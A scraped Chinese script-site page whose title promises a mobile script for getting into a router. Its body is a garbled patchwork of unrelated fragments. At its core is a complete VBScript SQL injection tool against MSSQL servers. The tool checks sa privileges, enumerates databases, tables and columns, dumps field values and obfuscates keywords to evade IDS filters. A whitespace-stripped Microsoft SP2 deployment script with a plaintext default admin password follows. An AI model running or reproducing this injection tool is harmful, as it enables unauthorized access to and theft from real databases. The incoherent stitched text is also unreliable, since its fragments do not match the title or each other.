移动小精灵脚本开发如何进路由器

发布时间:2021-06-09 来源:脚本之家 点击:

笔者在初步研究了Windows的SYSTEM.INI后发现,通过VB的多媒体控件MCI.VBX可以打开MPEG压缩文件(如VCD2.0版的.DAT文件)

代码:


解释:
1、string.replace(regexp, replacement): replacement可以是function. In this case, the function is invoked for each match, and the string it returns is used as the replacement text.

2、new Function(argument_names..., body): 注意参数中的body. 这样,用new Function('body')()
, 也可以像eval一样动态执行代码

视频脚本大纲

输入中文后英文要取决于你的电脑会讲英文还是中文当需要更新整个表中的信息时,可以使用这个常量


set arg=wscript.arguments

If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then
Wscript.Quit
End If
if arg.count=0 then
usage()
Wscript.Quit
End If

Sub usage()
wsh.echo string(79,"*")
wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型,url里有&请用双引号包含url"
wsh.echo "sqlids v0.7 for mssql2000 with error by lcx"
wsh.echo "以下两个脚本可互相参考"
wsh.echo ""
wsh.echo ""
wsh.echo "Usage:"
wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到当前权限"&vbcrlf&"Ex:cscript sql.vbs limit"
wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部库名"&vbcrlf&"Ex:cscript sql.vbs dbname"
wsh.echo "cscript "&wscript.scriptname&" url table 库名||-------->得到所给库的全部表名"&vbcrlf&"Ex:cscript sql.vbs table
master"
wsh.echo "cscript "&wscript.scriptname&" url filed 库名 表名 ||---------->得到所给库所给表的全部字段"&vbcrlf&"Ex:cscript sql.vbs
id=1 filed master spt_server_info"
wsh.echo "cscript "&wscript.scriptname&" url result 字段名 库名 表名||--->得所给库、表、字段的字段值"&vbcrlf&"Ex:cscript sql.vbs
id=1 result id master sysinfo"
wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根据关键字查找字段"&vbcrlf&"Ex:cscript sql.vbs search
pass"
wsh.echo string(79,"*")&vbcrlf
end Sub


Function getHTTPPage(Path)
t=GetBody(Path)
getHTTPPage=BytesToBstr(t, "GB2312")
End Function

Function UrlEncode(str)
str=Replace(str," ","%20")
UrlEncode=str
End Function

Function GetBody(url)' xml得到网页源码,可以改成cookie或get提交
On Error Resume Next
Aurl=Split(url,"?") '这是为post提交的
Set Retrieval=CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "post", Aurl(0), False, "", ""
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.setRequestHeader "Accept-Encoding", "gzip, deflate"
.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR
3.0.04506; .NET CLR 1.1.4322)"
.setRequestHeader "Connection", "Keep-Alive"
.setRequestHeader "Cache-Control", "no-cache"
.Send UrlEncode(Aurl(1)) 'post提交
GetBody=.ResponseBody
.abort
End With
Set Retrieval=Nothing
End Function


Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream=CreateObject("adodb.stream")
objstream.Type=1
objstream.Mode=3
objstream.Open
objstream.Write Body
objstream.Position=0
objstream.Type=2
objstream.Charset=Cset
BytesToBstr=objstream.ReadTExt
objstream.Close
Set objstream=Nothing
End Function


Function ReplaceKeyWord(Value)'绕过ids过虑
Table="select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%
ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown-
>shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|
[k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k]
|sp_->s%p_|[k]|and->a%nd"
Dim i, Relpacement, Temp
Relpacement=Split(Table, "|[k]|")
ReplaceKeyWord=Value
For i=0 to UBound(Relpacement)
Temp=Split(Relpacement(i), "->")
If UBound(Temp)=1 Then ReplaceKeyWord=Replace(ReplaceKeyWord, Temp(0), Temp(1))
NExt
End Function


Function result(sHTMLTEMP) '用varchar做关键字分隔网页内容,用正则帅一点,可惜不太会
aHTML=Split(sHTMLTEMP, "varchar")
If(UBound(aHTML) > 0)Then
sHTMLTEMP=aHTML(1)
aHTML=Split(sHTMLTEMP, "'")
sHTMLTEMP=aHTML(1)
End If
result=sHTMLTEMP
End Function

Function Str2HEx(strHEx)'sql的16进制转换函数
Dim sHEx
For i=1 To Len(strHEx)
sHEx=sHEx & HEx(Asc(Mid(strHEx,i,1)))&"00"
NExt
Str2HEx="0x"&sHEx
End Function

Function Str2HExtwo(strHEx)'sql的16进制转换函数
Dim sHEx
For i=1 To Len(strHEx)
sHEx=sHEx & HEx(Asc(Mid(strHEx,i,1)))
NExt
Str2HExtwo="0x"&sHEx
End Function


Function MoveR(Rstr) '去重复
Dim i,SpStr
SpStr=Split(Rstr,",")
For i=0 To Ubound(Spstr)
If I=0 then
MoveR=MoveR & SpStr(i) & ","
Else
If instr(MoveR,SpStr(i))=0 and i=Ubound(Spstr) Then
MoveR=MoveR & SpStr(i)
Elseif instr(MoveR,SpStr(i))=0 Then
MoveR=MoveR & SpStr(i) & ","
End If
End If
NExt
End Function


function page(sql)
page=Replace(getHTTPPage(url&" "&ReplaceKeyWord(sql)),Chr(34),"")
End Function

url=arg(0)

injection=arg(1)


'--------------------------------------以下代码是注入语句,完全不需要引号
select case arg(1)

Case "limit"
body=Replace(getHTTPPage(url),Chr(34),"")
'语句单独提出来,方便以后修改,第一条是sa,第二条是DB_owner
sqlone="and (select is_srvrolemember(0x730079007300610064006D0069006E00))>0--"
sqltwo="and (select is_member(0x640062005F006F0077006E0065007200))>0--"
Bodyone=page(sqlone)
bodytwo=page(sqltwo)
wsh.echo "当前信息:"
If Len(body)=Len(Bodyone) Then wsh.echo "SA"

If Len(body)=Len(Bodytwo) And Len(body)<>Len(Bodyone) Then
wsh.echo "DB_owner"
Else
wsh.echo "PUBLIC"
End If

sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--"
rtemp=Split(sqlthtree,"|")
servername=result(page(rtemp(0)))
version=result(page(rtemp(1)))
user=result(page(rtemp(2)))
db_name=result(page(rtemp(3)))
wsh.echo "servername:"&servername
wsh.echo "version:"&version
wsh.echo "user:"& user
wsh.echo "db_name:"& db_name

case "dbname"
i=1
Do
sql="and db_name("&i&")>0--" '暴库名语句
Body=page(sql)
k=InstrRev(body,"varchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0

case "table"
i=1
Do
' 表名语句 agr(2)表示库
sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects
where xtype=0x7500))--"
Body=page(sql)
k=InstrRev(body,"varchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0

case "filed"
sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&Str2HEx(arg(3))&")=0--
"
biaoid=result(page(sqlbiaoid))
biaoid=Replace(biaoid,Chr(124),"")
sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- "
k=Replace(result(page(sqlclounmcnt)),Chr(94),"")
wsh.echo "共有列名"&k&"个"
For i=1 To k
sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere
id="&biaoid&" order by colid) t order by colid desc)=0--"
wsh.echo result(page(sqlfiled))
nExt


case "result"

i=1
sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" '暴列的总数目语句
k=result(page(sqlcloum))
k=Replace(k,Chr(94),"")
wsh.echo arg(2)&"字段共有记录数"&k&"个"&vbcrlf
For i=1 To k
sqlneirong="an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4)
&"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--"
Body=page(sqlneirong)
wscript.echo Replace(result(body),Chr(94),"")
Next


Case "search"
love=Str2HExtwo(arg(2))
wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式"
TimeSpend=Timer
For i=1 To 10 '可以根据需要改动这个10
sqlsearch="And (selecttop1t_name%2bchar(124)%2bc_namefrom(selecttop"&i&"object_name(id)ast_name,nameasc_namefromsyscolumnswherecharindEx(cast("&love&"asvarchar(2000)),name)%3E0andleft(name,1)!=0x40orderbyt_nameasc)asTorderbyt_namedesc)>0--"
Body=page(sqlsearch)
body=result(body)
a=a&body&","
NExt
TimeSpend=round(Timer - TimeSpend,2)
wsh.echo MoveR(a)
wsh.echo "用时:" & TimeSpend & "秒."




Case Else
If arg(1)<>"limit" Or arg(1)<>"dbname" Or arg(1)<>"search" Or arg(1)<>"table" Or arg(1)<>"filed" Then
wscript.echo "注意参数"
usage()
End if
end select

实际刚才录下的声音文件在每个数字声波间隔中还有很大一段没有有用信息的空间


'******************************************************************************
'install.vbs
'Author:PeterCostantini,theMicrosoftScriptingGuys
'Date:9/1/04
'Mustbedeployedtoaclientandlaunchedremotelybyscenario1.vbs.
'Assumesthatrunonce.vbsisinsamedirectoryasscript.
'AssumesthatWindowsXPServicePack2setupprogramisonaremoteserver
'andrunonce.vbsareinsamedirectoryasscript.
'1.RunsServicePack2setupprogramfromremoteservertoinstall
'WindowsXPServicePack2.Thiscouldtakeoneortwohours.
'2.ConfigurestheAutoAdminandRunOnceregistrysettingsnecessary
'torunrunonce.vbs.
'3.Logsresultstotextfile,<computername>-sp2-instlog.txtandcopies
'thefilebacktoadminworkstation.
'4.ForcesarebootofthelocalmachinesothattheAutoAdminandRunOnce
'registrysettingstakeeffect.
'******************************************************************************

OnErrorResumeNext

'Initializeglobalconstantsandvariables.
ConstFOR_APPENDING=8
g_strLocalFolder="c:\temp-ac"
'Changenameofcomputertoactualadministrativeworkstationorlocal
'pathtowhichlogshouldbecopied.
g_strRemoteFolder="\\<adminwkstn>\c$\temp-ac"

'Getcomputername.
g_strComputer=GetComputerName
g_strLogFile=g_strComputer&"-sp2-instlog.txt"

'Createlogfile.
SetobjFSO=CreateObject("Scripting.FileSystemObject")
SetobjTextStream=objFSO.OpenTextFile(g_strLogFile,FOR_APPENDING,True)
objTextStream.WriteLine"WindowsXPServicePack2"&_
"InstallationandConfigurationLog:Phase1"
objTextStream.WriteLineNow
objTextStream.WriteLineg_strComputer
objTextStream.WriteLineString(Len(g_strComputer),"-")

'Handlelogicofcallingfunctionsandsub-routinestoinstallServicePack2
'andconfigureAutoAdministration.
blnInstallSP=InstallSP
IfblnInstallSP=FalseThen
CopyLog
WScript.Quit
EndIf
blnAutoAdmin=ConfigAutoAdmin
IfblnAutoAdmin=FalseThen
CopyLog
WScript.Quit
EndIf
Reboot

'******************************************************************************

FunctionGetComputerName

SetobjWMIService=GetObject("winmgmts:{impersonationLevel=impersonate}!\\."_
&"\root\cimv2")
SetcolSystems=objWMIService.ExecQuery("SELECT*FROMWin32_ComputerSystem")
ForEachobjSytemIncolSystems
GetComputerName=objSytem.Name
Next

EndFunction

'******************************************************************************

FunctionInstallSP

'EditthislinetoincludetheserverandsharenamewheretheWindowsXP
'ServicePack2setupprogramislocated.
strInstallPath="\\servername\xpsp2\WindowsXP-KB835935-SP2-ENU.exe"&_
"/quiet/norestart/o"

SetWshShell=CreateObject("Wscript.Shell")
SetobjExec=WshShell.Exec(strInstallPath)
'Thiscouldtakeoneortwohours.
objTextStream.WriteLine"Installationstarted..."
IfErr=0Then
'LoopuntilExecisfinished-Status=1.
DoWhileobjExec.Status=0
'Pausefor10secondsbeforechecking.
'Toreducenetworktraffic,makeintervallonger.
WScript.Sleep10000
Loop
objTextStream.WriteLine"ServicePack2installationcompleted."
InstallSP=True
Else
objTextStream.WriteLine"UnabletoinstallServicePack2."&VbCrLf&_
"ErrorconnectingtoServicePack2onserver."&VbCrLf&_
"Errornumber:"&Err.Number&VbCrLf&_
"Errorsource:"&Err.Source&VbCrLf&_
"Errordescription:"&Err.Description
InstallSP=False
EndIf
Err.Clear

EndFunction

'******************************************************************************

FunctionConfigAutoAdmin

ConstHKEY_LOCAL_MACHINE=&H80000002
strKeyPath1="SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon"
strKeyPath2="SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strDefaultUserName="Administrator"
strDefaultPassword="P@ssw0rd"
strDefaultDomainName="Contoso"
intAutoAdminLogon=1
strRunOnceEntry="MyScript"
strRunoncePath=g_strLocalFolder&"\runonce.vbs"

SetobjReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\"&_
g_strComputer&"\root\default:StdRegProv")

'SetstrDefaultUserNametouserwithAdministratorcredentials.
intRet1=objReg.SetStringValue(HKEY_LOCAL_MACHINE,strKeyPath1,_
"DefaultUserName",strDefaultUserName)
IfintRet1<>0Then
objTextStream.WriteLine"Error:DefaultUserNamenotconfigured."
EndIf

'SetstrDefaultPasswordtopasswordofdefaultusername.
intRet2=objReg.SetStringValue(HKEY_LOCAL_MACHINE,strKeyPath1,_
"DefaultPassword",strDefaultPassword)
IfintRet2<>0Then
objTextStream.WriteLine"Error:DefaultPasswordnotconfigured."
EndIf

'Uncommentnext5linesandeditlastparameterifdefaultdomain
'forthecredentialsisdifferentfromthatalreadyset.
'intRet3=objReg.SetStringValue(HKEY_LOCAL_MACHINE,strKeyPath1,_
'"DefaultDomainName",strDefaultDomainName)
'IfintRet3<>0Then
'objTextStream.WriteLine"Error:DefaultDomainNamenotconfigured."
'EndIf

'TurnonAutoAdminLogon
intRet4=objReg.SetStringValue(HKEY_LOCAL_MACHINE,strKeyPath1,_
"AutoAdminLogon","1")
IfintRet4<>0Then
objTextStream.WriteLine"Error:AutoAdminLogonnotconfigured."
EndIf

'AddMyScriptentrytoRunOncesubkey.
intRet5=objReg.SetStringValue(HKEY_LOCAL_MACHINE,strKeyPath2,_
strRunOnceEntry,strRunoncePath)
IfintRet5<>0Then
objTextStream.WriteLine"Error:MyScriptRunOnceentrynotconfigured."
EndIf

'Checkthatallregistrywriteoperationssucceeded.
If(intRet1+intRet2+intRet3+intRet4+intRet5)=0Then
objTextStream.WriteLine"AutoAdminLogonandRunOnceconfigured."
ConfigAutoAdmin=True
Else
objTextStream.WriteLine"Error:AutoAdminLogonandRunOncenotfully"&_
"configured."
ConfigAutoAdmin=False
EndIf

EndFunction

'******************************************************************************

SubReboot

ConstFORCED_REBOOT=6
SetobjWMIService=GetObject("winmgmts:{impersonationLevel=impersonate,"&_
"(Shutdown)}!\"&g_strComputer&"\root\cimv2")
SetcolOSes=objWMIService.ExecQuery("SELECT*FROMWin32_OperatingSystem")
objTextStream.WriteLine"Attemptingtoreboot..."
CopyLog
ForEachobjOSIncolOSes'OnlyoneobjOSincollection
intReturn=objOS.Win32Shutdown(FORCED_REBOOT)
IfintReturn<>0Then
SetobjTextStream=objFSO.OpenTextFile(g_strLogFile,FOR_APPENDING,True)
objTextStream.WriteLineNow
objTextStream.WriteLine"Error:Unabletoreboot."&VbCrLf&_
"Returncode:"&intReturn
CopyLog
EndIf
Next

EndSub

'******************************************************************************

SubCopyLog

'Closetextfile.
objTextStream.WriteLine"Closinglogandattemptingtocopyfileto"&_
"administrativeworkstation."
objTextStream.WriteLine
objTextStream.WriteLineString(80,"-")
objTextStream.WriteLine
objTextStream.Close

'Copylog.
IfNotobjFSO.FolderExists(g_strRemoteFolder)Then
objFSO.CreateFolder(g_strRemoteFolder)
IfErr<>0Then
Err.Clear
ExitSub
EndIf
EndIf
objFSO.CopyFileg_strLogFile,g_strRemoteFolder&""

EndSub
如木马、端口扫描器、客户端工具、CGI漏洞扫描器……

strComputer="."
arrTargetProcs=Array("calc.exe", "notepad.exe", "other.exe")
'数组里为要监视的进程名

您被禁用->


即使如此,也是为了进行错误处理。

网站地图 | Tag标签 | RSS订阅
Copyright © 2012-2019 脚本之家 All Rights Reserved
脚本之家  渝ICP备13030612号